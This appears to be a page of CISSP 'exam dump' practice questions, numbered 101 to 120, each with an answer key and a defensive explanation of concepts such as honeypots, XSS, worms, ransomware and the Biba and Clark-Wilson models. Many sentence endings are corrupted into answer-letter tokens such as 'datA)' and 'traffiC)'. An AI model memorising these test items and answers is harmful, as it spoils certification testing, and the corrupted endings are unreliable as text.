Visit here for our full ISC CISSP exam dumps and practice test questions.
Question 101
Which of the following best defines a honeypot in cybersecurity?
A) A decoy system designed to attract attackers
B) A firewall that filters malicious traffic
C) A backup server for disaster recovery
D) A secure VPN gateway
Answer: A) A decoy system designed to attract attackers
Explanation:
A honeypot is a deliberately designed system or network resource that appears vulnerable or valuable to cyber attackers, with the primary goal of attracting malicious activity in a controlled and monitored environment. By enticing attackers away from production systems, honeypots allow organizations to observe, record, and analyze attack techniques, malware behavior, and intrusion strategies without endangering critical assets. They provide a safe sandbox for studying real-world threats, improving situational awareness, and enhancing overall cybersecurity defenses.
Honeypots can be classified as low-interaction or high-interaction. Low-interaction honeypots simulate limited services or protocols, providing basic interaction to detect automated attacks or reconnaissance attempts. High-interaction honeypots, on the other hand, replicate full system environments, enabling detailed observation of attacker behavior, lateral movement, and exploitation tactics. The choice of honeypot type depends on organizational goals, risk tolerance, and resources available for monitoring and analysis.
Effective deployment requires careful planning, including proper network isolation, monitoring, and logging, to ensure that attackers cannot leverage the honeypot as a launching point to compromise real systems. Data gathered from honeypots contributes to threat intelligence, helping security teams identify new vulnerabilities, malware signatures, and attack patterns. This information can then be used to strengthen firewalls, intrusion detection systems, endpoint protections, and incident response procedures.
Beyond defensive applications, honeypots also serve as proactive early warning systems, alerting organizations to potential attacks before critical assets are targeteD) By combining careful placement, rigorous monitoring, and strategic analysis, honeypots support research, training, and continuous improvement of cybersecurity posture, providing organizations with actionable insights while reducing risk exposure in the digital environment.
Question 102
Which of the following best describes a warm site in disaster recovery planning?
A) A site with no pre-installed hardware or data
B) A fully operational backup site ready for immediate use
C) A site with basic infrastructure and partial pre-installed systems
D) A mobile temporary recovery facility
Answer: C) A site with basic infrastructure and partial pre-installed systems
Explanation:
A warm site is a disaster recovery facility that provides an intermediate level of preparedness between a hot site and a cold site. It is equipped with essential infrastructure, including pre-installed hardware, software, and network configurations, but does not typically maintain up-to-date live datA) Unlike cold sites, which require full installation and configuration during an incident, warm sites allow organizations to restore operations more quickly because core systems are already in place, significantly reducing downtime for critical business functions.
To ensure readiness, organizations often replicate key data and configurations to the warm site on a regular basis, using backup schedules aligned with Recovery Point Objectives (RPOs). This enables restoration of recent information and supports continuity in line with defined Recovery Time Objectives (RTOs). While warm sites are not as immediately operational as hot sites, they offer a cost-effective solution for organizations that require faster recovery than cold sites can provide but cannot justify the expense of a fully mirrored hot site.
Effective use of a warm site requires thorough planning, including clear activation procedures, defined roles and responsibilities, and documented processes for bringing systems online. Regular testing and simulation exercises are critical to verify that hardware, software, and network components function as expected and that personnel are familiar with recovery protocols. Testing also helps identify gaps, update documentation, and refine coordination between primary and recovery sites.
By combining pre-configured infrastructure, periodic data replication, and procedural readiness, warm sites strike a balance between cost, efficiency, and operational resilience. They are an integral part of comprehensive disaster recovery and business continuity strategies, ensuring that organizations can resume critical operations in a timely manner while minimizing disruption and financial or reputational losses.
Question 103
Which security principle focuses on giving users the minimum access necessary to perform their tasks?
A) Separation of duties
B) Least privilege
C) Need-to-know
D) Role-based access control
Answer: B) Least privilege
Explanation:
The principle of least privilege is a fundamental security concept that ensures users, applications, and processes are granted only the minimum access rights necessary to perform their assigned tasks. By restricting permissions to what is strictly required, organizations reduce the risk of accidental or deliberate misuse of sensitive systems, data, and resources. This principle not only protects critical assets but also limits the potential damage from compromised accounts or malware infections, thereby reducing the attack surface.
Implementing least privilege is crucial in preventing privilege escalation attacks, where unauthorized users exploit elevated permissions to gain broader access, and in mitigating insider threats by ensuring employees cannot access information or systems outside their responsibilities. The principle is commonly enforced through access control mechanisms such as role-based access control (RBAC), attribute-based access control (ABAC), and fine-grained access policies, as well as through automated identity and access management (IAM) systems that provision, modify, and revoke permissions systematically.
Maintaining least privilege requires ongoing review, monitoring, and auditing to ensure that access rights remain aligned with users’ current roles and responsibilities. Changes in job functions, project assignments, or departmental structures must trigger updates to permissions to avoid unnecessary exposure. Additionally, temporary or elevated access should be tightly controlled and monitored, with clear expiration policies and logging for accountability.
By consistently applying the principle of least privilege, organizations strengthen their overall security posture while supporting operational efficiency and accountability. It not only helps protect sensitive information and critical systems but also supports regulatory compliance and security frameworks, including NIST, ISO 27001, and PCI DSS. Ultimately, least privilege is a proactive strategy that enforces disciplined access management, minimizes risk, and enhances organizational resilience against both internal and external threats.
Question 104
Which of the following is the primary purpose of a digital signature?
A) Encrypting sensitive data
B) Authenticating the sender and ensuring data integrity
C) Compressing large files
D) Masking user identities
Answer: B) Authenticating the sender and ensuring data integrity
Explanation:
A digital signature is a cryptographic mechanism that provides authentication of the sender and ensures the integrity of a message, document, or transaction. By using asymmetric cryptography, the sender creates a signature with their private key, which can then be verified by recipients using the corresponding public key. This process guarantees that the message genuinely originates from the claimed sender and that its contents have not been altered during transmission, providing both authenticity and integrity.
Digital signatures also support non-repudiation, meaning that the sender cannot deny having sent the message, making them legally and operationally significant in sensitive communications. They are extensively used across multiple domains, including secure email (S/MIME), software distribution to verify code authenticity, financial transactions to validate agreements, and legal documents where proof of origin and integrity is essential.
The effectiveness of digital signatures relies heavily on proper key management. Private keys must be securely stored and protected from unauthorized access, while public keys should be distributed through trusted channels or digital certificates issued by Certificate Authorities (CAs). Standards such as RSA (Rivest-Shamir-Adleman), DSA (Digital Signature Algorithm), and ECDSA (Elliptic Curve Digital Signature Algorithm) provide robust frameworks for generating and verifying signatures.
Incorporating digital signatures into organizational workflows strengthens cybersecurity by preventing tampering, impersonation, and frauD) They play a critical role in modern secure communication frameworks, supporting trust, compliance, and accountability. By ensuring the authenticity, integrity, and non-repudiation of digital interactions, digital signatures help organizations maintain secure, verifiable, and legally defensible communication and transaction processes in an increasingly digital environment.
Question 105
Which type of malware is designed to replicate itself and spread to other systems?
A) Trojan
B) Worm
C) Spyware
D) Ransomware
Answer: B) Worm
Explanation:
A worm is a type of self-replicating malware that spreads autonomously across networks or systems without requiring any user interaction. Unlike Trojans, which rely on social engineering or the execution of malicious files by users, worms exploit vulnerabilities in operating systems, applications, or network protocols to propagate automatically. This autonomous behavior allows worms to infect large numbers of devices rapidly, making them particularly dangerous to organizational networks and critical infrastructure.
The impact of worm infections can be significant. They often consume network bandwidth, degrade system performance, and create opportunities for secondary attacks by delivering additional payloads such as backdoors, spyware, or ransomware. Some worms are also designed to harvest sensitive information, further increasing the potential damage. Due to their ability to spread without user intervention, worms can cause outbreaks that escalate quickly, making early detection and containment essential.
Effective defense against worms involves a combination of technical and procedural measures. Regular patch management ensures that known vulnerabilities exploited by worms are closed, while firewalls and intrusion detection or prevention systems (IDS/IPS) help identify and block suspicious network traffiC) Endpoint security solutions, including antivirus and behavioral monitoring, can detect and quarantine worm activity on individual devices. User awareness, though less critical than with Trojans, remains important for limiting potential infection vectors such as email attachments or removable mediA)
Studying worm behavior also contributes to stronger incident response and threat mitigation strategies, enabling organizations to anticipate propagation methods and implement targeted containment measures. By combining proactive security practices with continuous monitoring, organizations can minimize the risk of widespread worm infections, protect critical systems, and maintain operational resilience against fast-spreading malware threats.
Question 106
Which security model focuses on maintaining the integrity of information through strict rules on transactions and auditing?
A) Bell-LaPadula
B) Clark-Wilson
C) Biba
D) Brewer and Nash
Answer: B) Clark-Wilson
Explanation:
The Clark-Wilson security model is designed to ensure data integrity within commercial and business systems by enforcing well-formed transactions and maintaining strict separation of duties. Unlike models that prioritize confidentiality, such as Bell-LaPadula, Clark-Wilson focuses on the accuracy, consistency, and trustworthiness of data, making it particularly suitable for financial, banking, and enterprise resource management systems where operational integrity is critical.
At the core of the model are Transformation Procedures (TPs), which are authorized programs that are the only means by which data can be modifieD) All operations performed through TPs must follow defined business rules and are subject to Integrity Verification Procedures (IVPs) that confirm correctness and consistency. This dual mechanism ensures that data cannot be altered arbitrarily or maliciously, reducing the risk of errors, fraud, or unauthorized modifications.
Clark-Wilson also enforces the principle of separation of duties by requiring that no single individual has unrestricted control over sensitive operations. Certification and enforcement rules define which users and programs are authorized to perform specific transactions, preventing conflicts of interest and maintaining accountability. Auditing procedures further enhance security by tracking and logging all operations, allowing organizations to detect suspicious activity, investigate incidents, and demonstrate compliance with regulatory requirements.
By integrating rigorous verification, controlled access, and comprehensive auditing, the Clark-Wilson model ensures that business processes remain secure, reliable, and auditable. Proper implementation strengthens organizational trust, safeguards critical data, and supports regulatory compliance, ultimately reducing the risk of operational disruptions and fraudulent activity while enhancing overall system resilience.
Question 107
Which of the following is an example of multifactor authentication?
A) Password only
B) Smart card plus PIN
C) Username and password
D) Security question only
Answer: B) Smart card plus PIN
Explanation:
Multifactor Authentication (MFA) is a security mechanism that requires users to provide two or more independent forms of verification before gaining access to systems, applications, or datA) The verification factors are typically categorized into three types: something the user knows (like a password or PIN), something the user has (such as a smart card, security token, or mobile device), and something the user is (biometric identifiers such as fingerprints, facial recognition, or iris scans). By requiring multiple factors, MFA significantly strengthens authentication, making it far more difficult for attackers to gain unauthorized access, even if one factor—such as a password—is compromiseD)
A common example of MFA is the combination of a smart card with a PIN, which requires both possession of the card and knowledge of the correct PIN to authenticate successfully. MFA is widely deployed in high-security environments such as online banking, enterprise networks, cloud platforms, and government systems. Modern implementations often incorporate risk-based or adaptive authentication, dynamically adjusting verification requirements based on contextual factors like device type, geographic location, login patterns, or unusual behavior.
Beyond preventing unauthorized access, MFA supports regulatory compliance with frameworks such as NIST SP 800-63, ISO 27001, and PCI DSS. It also reduces the risk of phishing, credential theft, and brute-force attacks while enhancing user trust in digital services. Organizations implementing MFA benefit from a layered security approach, ensuring that access control policies remain robust even as threat landscapes evolve.
Ultimately, MFA is a critical component of modern cybersecurity strategies, combining usability with strong protection to safeguard sensitive information and maintain the integrity of digital systems, while also promoting a proactive security culture across users and administrators alike.
Question 108
Which of the following defines a Recovery Point Objective (RPO)?
A) The maximum tolerable downtime of a system
B) The targeted time to restore a system after failure
C) The acceptable amount of data loss measured in time
D) The mean time between failures
Answer: C) The acceptable amount of data loss measured in time
Explanation:
The Recovery Point Objective (RPO) defines the maximum acceptable amount of data loss that an organization can tolerate in the event of a disruption or disaster, expressed as a time interval. It serves as a key metric in business continuity and disaster recovery planning, helping organizations determine how frequently data should be backed up or replicated to minimize potential loss. For instance, if a system has an RPO of four hours, backups or replication processes must occur at least every four hours so that, in the event of a failure, no more than four hours of data is lost.
RPO plays a critical role in shaping backup strategies, influencing the selection of technologies and solutions such as on-site backups, offsite replication, snapshots, or cloud-based backup services. Systems and applications with high criticality typically require lower RPOs, meaning more frequent backups, while less critical systems may tolerate longer intervals. Organizations must also consider regulatory compliance requirements, industry standards, and operational risk tolerance when defining RPOs.
Establishing an appropriate RPO ensures that data protection measures align with business objectives and that recovery strategies can effectively limit disruption. In practice, it works in conjunction with the Recovery Time Objective (RTO), which specifies how quickly systems must be restored, to provide a complete framework for resilience planning.
Regularly reviewing and updating RPOs is essential, as business operations, technology environments, and threat landscapes evolve. By continuously aligning data protection objectives with organizational priorities, companies can reduce financial, operational, and reputational risks associated with data loss while ensuring that critical information remains available and recoverable when needeD)
Question 109
Which of the following best describes a zero-day vulnerability?
A) A vulnerability that has been publicly disclosed and patched
B) A vulnerability unknown to vendors and with no available patch
C) A vulnerability that affects only legacy systems
D) A vulnerability that has been exploited after patching
Answer: B) A vulnerability unknown to vendors and with no available patch
Explanation:
A zero-day vulnerability is a security flaw in software or hardware that is unknown to the vendor and for which no official patch or fix exists at the time of discovery. Because the vulnerability has not been publicly disclosed or addressed, attackers can exploit it to gain unauthorized access, steal sensitive data, disrupt services, or compromise systems before any defensive measures can be implementeD) The term “zero-day” highlights that the vendor has had zero days to respond to the issue, making these vulnerabilities particularly dangerous and highly sought after by cybercriminals and threat actors.
Protecting against zero-day vulnerabilities requires a proactive, multi-layered security strategy. This includes deploying intrusion detection and prevention systems, behavior-based and anomaly monitoring, network segmentation, endpoint protection, and threat intelligence feeds to identify unusual activity. Organizations should also implement robust patch management processes to quickly apply updates once fixes become available. Additionally, employee awareness and strong access controls can limit the potential impact of an exploit.
Having a well-defined incident response plan is critical for minimizing damage from zero-day attacks. Continuous monitoring, regular security assessments, and rapid response capabilities help organizations detect, contain, and remediate incidents effectively. By combining technical defenses, strategic planning, and employee vigilance, organizations can reduce their exposure to zero-day threats and enhance their overall cybersecurity resilience, even against previously unknown attack vectors.
Question 110
Which type of firewall examines the state of active connections and makes decisions based on connection context?
A) Packet-filtering firewall
B) Stateful inspection firewall
C) Proxy firewall
D) Next-generation firewall
Answer: B) Stateful inspection firewall
Explanation:
A stateful inspection firewall, also known as a dynamic packet-filtering firewall, is a network security device that monitors active connections and makes filtering decisions based on the state and context of network traffiC) Unlike traditional packet-filtering firewalls, which inspect each packet individually without considering its relationship to other packets, stateful firewalls maintain session information, including source and destination IP addresses, ports, protocol types, and the current state of the connection. This enables them to distinguish between legitimate traffic that is part of an established session and potentially malicious traffic attempting to bypass security controls.
By tracking the state of active sessions, stateful inspection firewalls can enforce more granular security policies and detect abnormal patterns indicative of attacks, such as spoofed packets, unauthorized connection attempts, or session hijacking. They are also effective against certain types of Denial-of-Service (DoS) attacks by monitoring the number and behavior of ongoing connections and applying threshold-based controls to mitigate overloaD)
Stateful firewalls are commonly deployed at the perimeter of enterprise networks, between internal subnets, and at points of connection to external networks. Their ability to maintain session tables and monitor traffic context allows them to provide a balance between strong security and efficient traffic flow, ensuring that authorized communications are not unnecessarily blockeD)
In addition to session monitoring, many stateful firewalls incorporate features such as network address translation (NAT), virtual private network (VPN) support, and intrusion prevention capabilities, further enhancing network protection. Regular updates, proper configuration, and integration with other security measures are essential to maximize effectiveness. By combining traffic awareness, contextual filtering, and active monitoring, stateful inspection firewalls form a critical layer in modern network defense strategies.
Question 111
Which of the following best describes a disaster recovery plan (DRP)?
A) A plan to prevent cyberattacks
B) A strategy for restoring systems and data after a disruptive event
C) A compliance audit schedule
D) A physical security inspection procedure
Answer: B) A strategy for restoring systems and data after a disruptive event
Explanation:
A Disaster Recovery Plan (DRP) is a structured set of procedures designed to restore IT systems, applications, and data following disruptions such as natural disasters, cyberattacks, hardware failures, or human errors. The primary goal of a DRP is to ensure that critical systems can be recovered efficiently, minimizing downtime and reducing the impact on business operations.
A comprehensive DRP identifies essential systems and data, defines recovery priorities, specifies backup and restoration strategies, and outlines communication protocols during an incident. It also assigns clear roles and responsibilities to IT staff and other stakeholders, ensuring that everyone knows their tasks during a recovery scenario. Integration with a Business Continuity Plan (BCP) is common, providing a holistic approach to maintaining or quickly resuming essential business functions alongside IT recovery efforts.
Regular testing, such as tabletop exercises or full-scale simulations, is critical to verify the plan’s effectiveness and identify gaps in procedures, infrastructure, or personnel readiness. DRPs must also be periodically updated to reflect changes in technology, applications, regulatory requirements, and emerging threats.
An effective DRP not only restores systems and data but also helps organizations reduce financial losses, maintain compliance with legal or industry regulations, and sustain trust among customers, partners, and employees. By proactively planning for disruptive events, organizations enhance operational resilience, ensure continuity of critical services, and reinforce their ability to respond to and recover from incidents in a controlled and timely manner.
Question 112
Which type of attack involves an attacker inserting malicious scripts into trusted websites viewed by other users?
A) Cross-site scripting (XSS)
B) SQL injection
C) Man-in-the-middle attack
D) Phishing
Answer: A) Cross-site scripting (XSS)
Explanation:
Cross-site scripting (XSS) attacks occur when an attacker injects malicious scripts into a trusted website, which are then executed in the browsers of unsuspecting users. These scripts can steal session cookies, manipulate page content, perform unauthorized actions on behalf of the user, or redirect visitors to malicious sites. XSS attacks exploit vulnerabilities in web applications, typically arising from improper input validation, insufficient output encoding, or insecure handling of user-generated content.
There are three main types of XSS attacks. Reflected XSS occurs when user-supplied input is immediately returned by the web server without proper sanitization. Stored XSS involves injecting malicious scripts that are permanently saved on the server, such as in databases or forums, and served to multiple users. DOM-based XSS happens when client-side scripts manipulate the Document Object Model in unsafe ways, allowing malicious input to execute within the user’s browser.
Mitigation strategies include rigorous input validation, context-aware output encoding, implementing Content Security Policies (CSPs), and following secure development practices throughout the application lifecycle. Regular security testing, such as penetration testing and code reviews, also helps identify potential XSS vulnerabilities before attackers can exploit them.
Understanding XSS is crucial for maintaining web application security. By effectively preventing and mitigating these attacks, organizations protect user data, preserve trust in their online platforms, and reduce the risk of reputational damage, financial loss, or regulatory penalties. Proper awareness and proactive measures form an essential component of a robust cybersecurity posture for modern web applications.
Question 113
Which of the following is a core principle of the Biba security model?
A) Preventing unauthorized disclosure of information
B) Maintaining data integrity by preventing unauthorized modification
C) Ensuring system availability during attacks
D) Enforcing separation of duties
Answer: B) Maintaining data integrity by preventing unauthorized modification
Explanation:
The Biba security model is a formal framework designed to preserve data integrity, ensuring that information remains accurate, consistent, and trustworthy throughout its entire lifecycle. Unlike models such as Bell-LaPadula, which primarily focus on maintaining confidentiality, Biba emphasizes protecting data from unauthorized or improper modification. It does this by enforcing two main rules: no write up, which prevents subjects—such as users or processes—from writing to objects at higher integrity levels, and no read down, which prevents subjects from reading data at lower integrity levels. These rules control the flow of information, ensuring that high-integrity data cannot be compromised by lower-integrity or less reliable sources.
The Biba model is especially important in environments where the accuracy and reliability of information are critical. In financial systems, for example, it ensures that accounting records, transaction logs, and other sensitive data cannot be altered by unverified processes or applications, protecting against fraud and errors. In industrial control and safety-critical systems, it helps maintain the integrity of sensor readings, operational logs, and control commands, preventing corrupted data from leading to unsafe decisions or system failures. Healthcare systems and scientific research also rely on Biba principles to ensure the accuracy of medical records, laboratory results, and experimental data, supporting reliable diagnoses, treatments, and research outcomes. By controlling how data can be accessed and modified, the Biba model provides a structured approach to safeguarding the trustworthiness of critical information across diverse domains, making it a cornerstone of integrity-focused security practices.
Question 114
Which of the following describes social engineering attacks?
A) Exploiting software vulnerabilities
B) Manipulating people to gain unauthorized access
C) Deploying ransomware
D) Network packet sniffing
Answer: B) Manipulating people to gain unauthorized access
Explanation:
Social engineering attacks exploit human psychology rather than technical vulnerabilities to gain unauthorized access to systems, sensitive information, or organizational resources. Instead of targeting software flaws or network weaknesses, attackers manipulate natural human tendencies such as trust, fear, curiosity, urgency, or helpfulness to deceive individuals into revealing credentials, granting system access, or performing actions that compromise security. Common social engineering techniques include phishing emails that appear legitimate but contain malicious links or attachments, pretexting, in which attackers fabricate convincing scenarios to extract sensitive information, baiting with enticing offers or rewards, tailgating to gain unauthorized physical access to restricted areas, and direct impersonation of trusted personnel such as IT staff or executives.
These attacks are particularly effective because humans often represent the weakest link in otherwise strong technical security measures. Even in organizations with firewalls, intrusion detection systems, and robust encryption, an unsuspecting employee who falls for a persuasive pretext or clickbait email can inadvertently expose sensitive data or create access points for attackers. Real-world examples include spear-phishing campaigns targeting corporate executives to steal confidential documents, phone scams to obtain authentication codes, fraudulent IT support requests that trick users into installing malware, or deceptive social media interactions designed to harvest personal information. As organizations increasingly rely on digital systems and remote work, the threat of social engineering continues to grow, emphasizing the need for comprehensive employee training, awareness programs, and verification procedures to mitigate human-targeted security risks effectively.
Question 115
Which type of attack captures network traffic to intercept sensitive information?
A) Replay attack
B) Sniffing
C) Brute-force attack
D) Denial-of-service attack
Answer: B) Sniffing
Explanation:
Sniffing is a network attack technique used to capture and analyze network traffic with the goal of extracting sensitive information such as usernames, passwords, session tokens, or other confidential datA) Attackers employ packet sniffers, which are specialized tools or software, to monitor the flow of data over networks. Sniffing can target various types of communication channels, including local area networks (LANs), Wi-Fi networks, or other network infrastructures, especially when the transmitted data is unencrypteD)
There are two main types of sniffing: passive and active. Passive sniffing involves quietly observing network traffic without altering it, making it difficult for victims to detect. This method is often employed on networks where traffic naturally passes through a central point, such as a hub or wireless access point. Active sniffing, on the other hand, involves manipulating or redirecting network traffic to capture more sensitive information or gain unauthorized access. Techniques such as ARP spoofing or man-in-the-middle attacks are commonly used in active sniffing to intercept communications between devices.
To mitigate the risks associated with sniffing attacks, organizations should implement robust security measures. Encryption protocols like TLS (Transport Layer Security) or SSL (Secure Sockets Layer) protect data in transit, ensuring that intercepted traffic remains unreadable to attackers. Network segmentation and the use of virtual private networks (VPNs) can further limit exposure by isolating sensitive communications. Additionally, continuous network monitoring and anomaly detection help identify unusual patterns indicative of sniffing attempts.
Sniffing attacks underscore the critical importance of maintaining secure communication channels, applying strong encryption, and ensuring network visibility. By combining these strategies, organizations can effectively protect sensitive data, maintain confidentiality, and reduce the risk of unauthorized access caused by network traffic interception.
Question 116
Which of the following access control models combines both discretionary and mandatory controls based on rules and policies?
A) Bell-LaPadula
B) Role-Based Access Control (RBAC)
C) Lattice-based model
D) Hybrid access control model
Answer: D) Hybrid access control model
Explanation:
A hybrid access control model integrates elements of both discretionary access control (DAC) and mandatory access control (MAC) to provide a more flexible and secure approach to managing access to resources. In DAC, resource owners have the authority to set permissions and grant or revoke access to users at their discretion. This approach offers flexibility and ease of management for routine operations, allowing individuals to manage their own files or applications without extensive administrative oversight. However, DAC alone may not provide sufficient protection for highly sensitive data, as it relies heavily on the judgment of individual users.
MAC, in contrast, enforces system-wide access policies based on classification labels or security levels assigned to users and resources. These policies are mandatory and cannot be altered by individual users, ensuring that sensitive information is protected according to organizational standards and compliance requirements. MAC is particularly effective for environments where data confidentiality and integrity are critical, such as government, military, or financial institutions.
By combining DAC and MAC, hybrid access control models allow organizations to balance flexibility with strict security enforcement. They enable granular access control decisions that take into account user roles, data sensitivity, and organizational policies. Administrators can define overarching security policies for critical resources while still permitting resource owners to manage day-to-day access for less sensitive information. This approach not only enhances security and prevents unauthorized disclosure or modification of critical assets but also supports regulatory compliance and operational efficiency.
Overall, hybrid access control models offer a practical and robust solution for modern organizations, providing the adaptability of DAC alongside the rigorous, policy-driven protections of MAC, resulting in a more secure and manageable access control framework.
Question 117
Which type of malware encrypts a victim’s files and demands payment for decryption?
A) Worm
B) Trojan
C) Ransomware
D) Spyware
Answer: C Ransomware
Explanation:
Ransomware is a type of malicious software designed to disrupt access to digital resources by encrypting files, locking systems, or otherwise rendering critical data inaccessible. Once infected, victims are typically presented with a ransom demand, often in cryptocurrency, in exchange for a decryption key or system restoration. Ransomware can propagate through multiple attack vectors, including phishing emails containing malicious attachments or links, compromised software downloads, or exploitation of unpatched vulnerabilities within networks and systems.
The impact of a ransomware attack can be severe, affecting operational continuity, causing significant financial loss, and damaging organizational reputation. For businesses that rely heavily on digital operations, downtime can lead to lost revenue, contractual penalties, and erosion of customer trust. In addition, sensitive data may be exposed or irreversibly lost if backups are unavailable or insufficient.
Effective mitigation requires a multi-layered approach. Regular and tested backups ensure data can be restored without succumbing to ransom demands. Endpoint protection, anti-malware tools, and timely patch management reduce vulnerabilities that ransomware exploits. User education is critical to minimize phishing risks, while network segmentation limits the spread of malware across critical systems. Organizations should maintain a detailed incident response plan that outlines containment procedures, forensic investigation, communication strategies, and recovery steps, emphasizing resilience without incentivizing ransom payment.
Overall, combating ransomware necessitates a combination of preventive, detective, and corrective controls. By proactively securing networks, educating users, and maintaining reliable recovery procedures, organizations can minimize the likelihood of infection, limit operational disruption, and ensure business continuity. Understanding the evolving tactics of ransomware operators is essential for maintaining robust cybersecurity defenses and safeguarding critical digital assets.
Question 118
Which of the following best describes the purpose of an Intrusion Detection System (IDS)?
A) To block unauthorized traffic
B) To detect and alert on suspicious network or system activity
C) To encrypt data in transit
D) To backup critical files
Answer: B) To detect and alert on suspicious network or system activity
Explanation:
An Intrusion Detection System (IDS) is a cybersecurity solution that monitors network or system activities to identify signs of malicious behavior, policy violations, or abnormal patterns, generating alerts for security teams to investigate. IDS can be classified into two main types: network-based (NIDS) and host-based (HIDS). NIDS monitors traffic across network segments to detect suspicious packets, unusual communication patterns, or known attack signatures, while HIDS focuses on activities on individual hosts, such as file integrity changes, unauthorized logins, or system configuration modifications.
Unlike firewalls or other preventive security tools, IDS does not actively block traffiC) Instead, it provides enhanced visibility into potential threats, allowing organizations to respond before attacks escalate. IDS solutions utilize various detection techniques, including signature-based detection, which identifies known attack patterns; anomaly detection, which flags deviations from normal behavior; and behavioral analysis, which evaluates user or system actions for unusual activity. Combining these methods increases detection accuracy and reduces false positives.
IDS contributes significantly to an organization’s overall security posture. By delivering early warnings of attempted intrusions, IDS supports timely incident response, helping security teams contain threats and mitigate damage. Additionally, IDS logs and alerts provide valuable data for forensic investigations, compliance reporting, and vulnerability assessments.
For IDS to be effective, proper configuration, continuous monitoring, and integration with other security solutions—such as Security Information and Event Management (SIEM) systems, firewalls, and endpoint protection—are critical. Regular updates to detection rules and signatures, along with periodic tuning to adapt to evolving threats, ensure that the system remains relevant and responsive.
Question 119
Which term refers to the unauthorized interception and modification of communications between two parties?
A) Phishing
B) Man-in-the-middle attack
C) Replay attack
D) Denial-of-service attack
Answer: B) Man-in-the-middle attack
Explanation:
A man-in-the-middle (MITM) attack occurs when an attacker secretly intercepts, relays, or modifies communications between two parties, making both believe they are directly communicating with each other. MITM attacks can target a variety of communication channels, including web traffic, emails, messaging platforms, and other network-based communications. By positioning themselves between the sender and receiver, attackers can steal sensitive information such as login credentials, financial data, or personal details. They can also inject malicious content, manipulate transactions, or alter messages without the knowledge of either party, potentially causing financial or reputational damage.
MITM attacks exploit weaknesses in network security, unencrypted communications, or poor authentication mechanisms. Common attack techniques include packet sniffing, ARP spoofing, DNS spoofing, and HTTPS stripping. Public Wi-Fi networks are particularly vulnerable, as attackers can intercept traffic more easily in unsecured or poorly configured networks.
Mitigation strategies focus on ensuring the confidentiality, integrity, and authenticity of communications. Strong encryption protocols like TLS/SSL prevent attackers from reading intercepted data, while proper certificate validation ensures that parties are communicating with legitimate entities. Mutual authentication, where both parties verify each other’s identities, further reduces the risk of impersonation. Secure network configurations, such as VPNs and network segmentation, help protect data in transit. Additionally, user awareness and monitoring for unusual network behavior—such as unexpected redirects, certificate warnings, or abnormal traffic patterns—can help detect and prevent MITM attacks early.
Overall, MITM attacks highlight the importance of robust security practices, proper implementation of cryptographic protocols, and vigilance in monitoring communications. By combining technical safeguards with user awareness, organizations and individuals can significantly reduce the risk of interception and manipulation of sensitive datA)
Question 120
Which of the following best describes a security audit?
A) A review and evaluation of security controls and practices
B) Installation of antivirus software
C) Configuration of firewalls
D) Routine patch deployment
Answer: A) A review and evaluation of security controls and practices
Explanation:
A security audit is a comprehensive and systematic evaluation of an organization’s information systems, policies, procedures, and controls to assess their effectiveness, identify potential vulnerabilities, ensure compliance, and evaluate overall risk exposure. These audits examine a wide range of security areas, including access management, network security, data protection, application security, incident response capabilities, and adherence to regulatory or industry standards such as ISO 27001, NIST, or GDPR.
Security audits can be performed internally by an organization’s own IT or security teams, or externally by independent auditors who provide an unbiased assessment of security posture. They are often conducted periodically, such as annually, or after major organizational changes, system upgrades, or security incidents to ensure ongoing compliance and effectiveness of controls.
The primary objectives of a security audit are to identify weaknesses or gaps in existing security measures, evaluate whether security policies are being followed, and recommend improvements to mitigate risks. Audits also provide evidence of accountability and due diligence for management, stakeholders, and regulators, demonstrating that the organization is actively managing its cybersecurity responsibilities.
Conducting regular security audits helps organizations maintain alignment with industry best practices, improve operational security, and protect critical information assets. Audit findings often inform strategic decisions regarding security investments, policy updates, and risk management strategies. By proactively identifying vulnerabilities and recommending corrective actions, security audits enhance an organization’s resilience against cyber threats, reduce the likelihood of data breaches, and increase stakeholder confidence in its cybersecurity posture.
Overall, security audits are an essential component of a robust cybersecurity program, providing both assurance and actionable insights to strengthen organizational defenses and maintain compliance with evolving security standards and regulatory requirements.